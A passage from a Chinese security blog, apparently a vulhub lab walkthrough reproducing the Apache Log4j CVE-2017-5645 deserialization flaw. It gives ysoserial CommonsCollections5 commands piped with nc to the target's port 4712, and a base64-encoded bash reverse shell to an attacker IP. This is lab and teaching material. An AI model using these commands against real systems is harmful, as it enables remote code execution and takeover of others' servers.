-
[ vulhub漏洞复现篇 ] Apache Log4j Server 反序列化命令执行漏洞 CVE-2017-5645
🍬 博主介绍
👨🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!一、漏洞编号
CVE-2017-5645- 1
二、影响版本
Apache Log4j 2.8.2之 前的2.x版本- 1
三、漏洞描述
Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。
四、环境搭建
采用的vulhub的漏洞环境,版本信息:log4j:2.8.1
1、进入CVE-2017-5645环境
cd vulhub/log4j/CVE-2017-5645- 1
2、启动CVE-2017-5645环境
docker-compose up -d- 1
3、查看CVE-2017-5645环境
docker-compose ps- 1
4、查看CVE-2017-5645提示信息
5、使用完关闭CVE-2017-5645环境
docker-compose down- 1
五、漏洞复现
我们这里执行创建文件的命令
1、进入容器查看对应文件内容
docker ps docker exec -it 04ab443887e4 /bin/bash ls /tmp- 1
- 2
- 3
2、使用ysoserial工具执行创建文件命令
1、准备命令并编码
首先准备编码好命令,前面好多文章写了,我后续的文章就会写的相对简易一点,就不详细写了
采用在线工具:https://www.loadcaps.com/runtime-exec-payloads/#java-lang-Runtime-exec- 1
2、工具下载地址
可以去我的资源里面找,也可以在网上直接下载https://download.csdn.net/download/qq_51577576/86514048- 1
3、使用ysoserial令靶机执行创建文件命令
我们使用ysoserial生成payload,然后直接发送给your-ip:4712端口即可。java -jar /root/Desktop/ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "touch /tmp/success" | nc 192.168.13.131 4712- 1
3、进入容器查看对应文件内容
发现多了一个success文件,这个文件就是我们之前创建的文件
说明漏洞确实存在,可以进行恶意攻击ls /tmp- 1
六、Getshell
1、攻击机采用nc进行监听
.\nc.exe -lvvp 55555- 1
2、靶机执行连接命令
1、准备反弹shell命令并编码
首先准备编码好的反弹shell命令,前面好多文章写了,我后续的文章就会写的相对简易一点,就不详细写了
采用在线工具:https://www.loadcaps.com/runtime-exec-payloads/#java-lang-Runtime-exec- 1
java -jar /root/Desktop/ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5Mi4xLzU1NTU1IDA+JjE=}|{base64,-d}|{bash,-i}"| nc 192.168.13.131 4712- 1
3、Getshell成功
执行ls
七、修复建议
升级到安全版本
八、相关资源
1.ysoserial工具下载地址:
https://download.csdn.net/download/qq_51577576/86514048- 1
2.exec采用在线工具:
https://www.loadcaps.com/runtime-exec-payloads/#java-lang-Runtime-exec- 1
3.Apche log4j远程代码执行漏洞复现一
https://blog.csdn.net/qq_51577576/article/details/121959727- 1
4.Apche log4j远程代码执行漏洞复现二
https://blog.csdn.net/qq_51577576/article/details/126444582- 1
5.docker 搭建 vulhub 靶场环境
https://blog.csdn.net/qq_51577576/article/details/125048165- 1
6.nc反弹shell
https://blog.csdn.net/qq_51577576/article/details/126128251- 1
7.bash反弹shell
https://blog.csdn.net/qq_51577576/article/details/126651576- 1
8.powercat反弹shell
https://blog.csdn.net/qq_51577576/article/details/126682933- 1
9.python反弹shell
https://blog.csdn.net/qq_51577576/article/details/126693846- 1
-
相关阅读:
HDFS读写流程
国产小体积超低成本电动车仪表智能刷卡解锁13.56M非接触式读写芯片CI522兼容替代RC522
为什么工作不能让人满意?
【操作系统】总结(二)linux指令
AI 音辨世界:艺术小白的我,靠这个AI模型,速识音乐流派选择音乐 ⛵
猿创征文|java开发常使用的工具
Ubuntu Server 20.04 LTS 64bit安装ftp服务
Java后端面试精选45题
Java 爬虫 jvppeteer
PCL点云处理之点云重建为Mesh模型并保存到PLY文件 ---方法二 (二百一十一)
- 原文地址:https://blog.csdn.net/qq_51577576/article/details/126818310